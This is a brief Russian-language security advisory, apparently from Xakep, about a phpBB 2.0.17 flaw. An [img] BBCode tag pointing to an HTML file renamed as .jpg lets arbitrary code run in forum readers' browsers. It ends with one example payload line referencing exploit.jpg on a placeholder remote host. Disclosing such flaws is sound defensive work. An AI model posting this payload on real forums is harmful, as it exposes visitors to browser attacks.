Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
В phpBB 2.0.17 обнаружена возможность
подключения произвольных HTML страниц.
Указав в теге IMG ссылку на произвольный HTML
файл, переименованный в jpg, можно выполнить
произвольный код в броузере
просматривающего форум.
Пример:
[img]http://theremotehost.com/exploit.jpg[/img]